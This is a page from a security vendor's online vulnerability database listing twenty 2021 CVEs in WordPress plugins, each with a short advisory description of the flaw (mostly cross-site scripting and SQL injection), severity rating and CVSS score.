Calgary, Alberta, Canada
sales@hackhalt.com
Free Download Free Download Free Download
Explore Pricing Explore Pricing Explore Pricing

Blog

"Prevention is cheaper than a breach"

Live Vulnerability Intelligence

Threat Database

Search CVEs, inspect descriptions, and open detail pages with AI-assisted technical context.

Total808
Critical39
High132
Medium616
Reset
Showing 721-740 of 808 records
Threat Entry Updated 2024-11-21

CVE-2021-24495 - Before 1 Plugin

The Marmoset Viewer WordPress plugin before 1.9.3 does not property sanitize, validate or escape the 'id' parameter before outputting back in the page, leading to a reflected Cross-Site Scripting issue.

PLUGIN Before 1

CVE-2021-24495

MEDIUM CVSS 6.1 2021-08-09
Open Full Technical Breakdown
Threat Entry Updated 2024-11-21

CVE-2021-24505 - Before 1 Plugin

The Forms WordPress plugin before 1.12.3 did not sanitise its input fields, leading to Stored Cross-Site scripting issues. The plugin was vulnerable to an Authenticated Stored Cross-Site Scripting (XSS) vulnerability within the Forms "Add new" field.

PLUGIN Before 1

CVE-2021-24505

MEDIUM CVSS 5.4 2021-08-09
Open Full Technical Breakdown
Threat Entry Updated 2025-05-07

CVE-2021-24502 - Before 1 Plugin

The WP Google Map WordPress plugin before 1.7.7 did not sanitise or escape the Map Title before outputting them in the page, leading to a Stored Cross-Site Scripting issue by high privilege users, even when the unfiltered_html capability is disallowed

PLUGIN Before 1

CVE-2021-24502

MEDIUM CVSS 4.8 2021-08-09
Open Full Technical Breakdown
Threat Entry Updated 2024-11-21

CVE-2021-24498 - Before 1 Plugin

The Calendar Event Multi View WordPress plugin before 1.4.01 does not sanitise or escape the 'start' and 'end' GET parameters before outputting them in the page (via php/edit.php), leading to a reflected Cross-Site Scripting issue.

PLUGIN Before 1

CVE-2021-24498

MEDIUM CVSS 6.1 2021-08-02
Open Full Technical Breakdown
Threat Entry Updated 2024-11-21

CVE-2021-24496 - Before 1 Plugin

The Community Events WordPress plugin before 1.4.8 does not sanitise, validate or escape its importrowscount and successimportcount GET parameters before outputting them back in an admin page, leading to a reflected Cross-Site Scripting issue which will be executed in the context of a logged in administrator

PLUGIN Before 1

CVE-2021-24496

MEDIUM CVSS 6.1 2021-08-02
Open Full Technical Breakdown
Threat Entry Updated 2024-11-21

CVE-2021-24461 - Before 1 Plugin

The get_faqs() function in the FAQ Builder AYS WordPress plugin before 1.3.6 did not use whitelist or validate the orderby parameter before using it in SQL statements passed to the get_results() DB calls, leading to SQL injection issues in the admin dashboard

PLUGIN Before 1

CVE-2021-24461

HIGH CVSS 8.8 2021-08-02
Open Full Technical Breakdown
Threat Entry Updated 2024-11-21

CVE-2021-24459 - Before 1 Plugin

The get_results() and get_items() functions in the Survey Maker WordPress plugin before 1.5.6 did not use whitelist or validate the orderby parameter before using it in SQL statements passed to the get_results() DB calls, leading to SQL injection issues in the admin dashboard

PLUGIN Before 1

CVE-2021-24459

HIGH CVSS 8.8 2021-08-02
Open Full Technical Breakdown
Threat Entry Updated 2024-11-21

CVE-2021-24457 - Before 1 Plugin

The get_portfolios() and get_portfolio_attributes() functions in the class-portfolio-responsive-gallery-list-table.php and class-portfolio-responsive-gallery-attributes-list-table.php files of the Portfolio Responsive Gallery WordPress plugin before 1.1.8 did not use whitelist or validate the orderby parameter before using it in SQL statements passed to the get_results() DB calls, leading to SQL injection issues in the admin dashboard

PLUGIN Before 1

CVE-2021-24457

HIGH CVSS 8.8 2021-08-02
Open Full Technical Breakdown
Threat Entry Updated 2024-11-21

CVE-2021-24455 - Before 1 Plugin

The Tutor LMS – eLearning and online course solution WordPress plugin before 1.9.2 did not escape the Summary field of Announcements (when outputting it in an attribute), which can be created by users as low as Tutor Instructor. This lead to a Stored Cross-Site Scripting issue, which is triggered when viewing the Announcements list, and could result in privilege escalation when viewed by an admin.

PLUGIN Before 1

CVE-2021-24455

MEDIUM CVSS 5.4 2021-08-02
Open Full Technical Breakdown
Threat Entry Updated 2024-11-21

CVE-2021-24443 - Before 1 Plugin

The About Me widget of the Youzify – BuddyPress Community, User Profile, Social Network & Membership WordPress plugin before 1.0.7 does not properly sanitise its Biography field, allowing any authenticated user to set Cross-Site Scripting payloads in it, which will be executed when viewing the affected user profile. This could allow a low privilege user to gain unauthorised access to the admin side of the blog by targeting an admin, inducing them to view their profile with a malicious payload adding a rogue account for example.

PLUGIN Before 1

CVE-2021-24443

MEDIUM CVSS 5.4 2021-08-02
Open Full Technical Breakdown
Threat Entry Updated 2024-11-21

CVE-2021-24447 - Before 1 Plugin

The WP Image Zoom WordPress plugin before 1.47 did not validate its tab parameter before using it in the include_once() function, leading to a local file inclusion issue in the admin dashboard

PLUGIN Before 1

CVE-2021-24447

MEDIUM CVSS 5.3 2021-07-19
Open Full Technical Breakdown
Threat Entry Updated 2024-11-21

CVE-2021-24442 - Before 1 Plugin

The Poll, Survey, Questionnaire and Voting system WordPress plugin before 1.5.3 did not sanitise, escape or validate the date_answers[] POST parameter before using it in a SQL statement when sending a Poll result, allowing unauthenticated users to perform SQL Injection attacks

PLUGIN Before 1

CVE-2021-24442

CRITICAL CVSS 9.8 2021-07-12
Open Full Technical Breakdown
Threat Entry Updated 2024-11-21

CVE-2021-24441 - Before 1 Plugin

The Sign-up Sheets WordPress plugin before 1.0.14 does not not sanitise or validate the Sheet title when generating the CSV to export, which could lead to a CSV injection issue

PLUGIN Before 1

CVE-2021-24441

HIGH CVSS 8.0 2021-07-12
Open Full Technical Breakdown
Threat Entry Updated 2024-11-21

CVE-2021-24439 - Before 1 Plugin

The Browser Screenshots WordPress plugin before 1.7.6 allowed authenticated users with a role as low as Contributor to perform Stored Cross-Site Scripting attacks as the image_class parameter of the browser-shot shortcode was not escaped.

PLUGIN Before 1

CVE-2021-24439

MEDIUM CVSS 5.4 2021-07-12
Open Full Technical Breakdown
Threat Entry Updated 2024-11-21

CVE-2021-24424 - Before 1 Plugin

The WP Reset – Most Advanced WordPress Reset Tool WordPress plugin before 1.90 did not sanitise or escape its extra_data parameter when creating a snapshot via the admin dashboard, leading to an authenticated Stored Cross-Site Scripting issue

PLUGIN Before 1

CVE-2021-24424

MEDIUM CVSS 5.4 2021-07-12
Open Full Technical Breakdown
Threat Entry Updated 2024-11-21

CVE-2021-24421 - Before 1 Plugin

The WP JobSearch WordPress plugin before 1.7.4 did not sanitise or escape multiple of its parameters from the my-resume page before outputting them in the page, allowing low privilege users to use JavaScript payloads in them and leading to a Stored Cross-Site Scripting issue

PLUGIN Before 1

CVE-2021-24421

MEDIUM CVSS 5.4 2021-07-12
Open Full Technical Breakdown
Threat Entry Updated 2024-11-21

CVE-2021-24440 - Before 1 Plugin

The Sign-up Sheets WordPress plugin before 1.0.14 did not sanitise or escape some of its fields when creating a new sheet, allowing high privilege users to add JavaScript in them, leading to a Stored Cross-Site Scripting issue. The payloads will be triggered when viewing the 'All Sheets' page in the admin dashboard

PLUGIN Before 1

CVE-2021-24440

MEDIUM CVSS 4.8 2021-07-12
Open Full Technical Breakdown
Threat Entry Updated 2024-11-21

CVE-2021-24419 - Before 1 Plugin

The WP YouTube Lyte WordPress plugin before 1.7.16 did not sanitise or escape its lyte_yt_api_key and lyte_notification settings before outputting them back in the page, allowing high privilege users to set XSS payload on them and leading to stored Cross-Site Scripting issues.

PLUGIN Before 1

CVE-2021-24419

MEDIUM CVSS 4.8 2021-07-12
Open Full Technical Breakdown
Threat Entry Updated 2024-11-21

CVE-2021-24406 - Before 1 Plugin

The wpForo Forum WordPress plugin before 1.9.7 did not validate the redirect_to parameter in the login form of the forum, leading to an open redirect issue after a successful login. Such issue could allow an attacker to induce a user to use a login URL redirecting to a website under their control and being a replica of the legitimate one, asking them to re-enter their credentials (which will then in the attacker hands)

PLUGIN Before 1

CVE-2021-24406

MEDIUM CVSS 6.1 2021-07-06
Open Full Technical Breakdown
Threat Entry Updated 2024-11-21

CVE-2021-24494 - Before 1 Plugin

The WP Offload SES Lite WordPress plugin before 1.4.5 did not escape some of the fields in the Activity page of the admin dashboard, such as the email's id, subject and recipient, which could lead to Stored Cross-Site Scripting issues when an attacker can control any of these fields, like the subject when filling a contact form for example. The XSS will be executed in the context of a logged in admin viewing the Activity tab of the plugin.

PLUGIN Before 1

CVE-2021-24494

MEDIUM CVSS 5.4 2021-07-06
Open Full Technical Breakdown
Scroll to top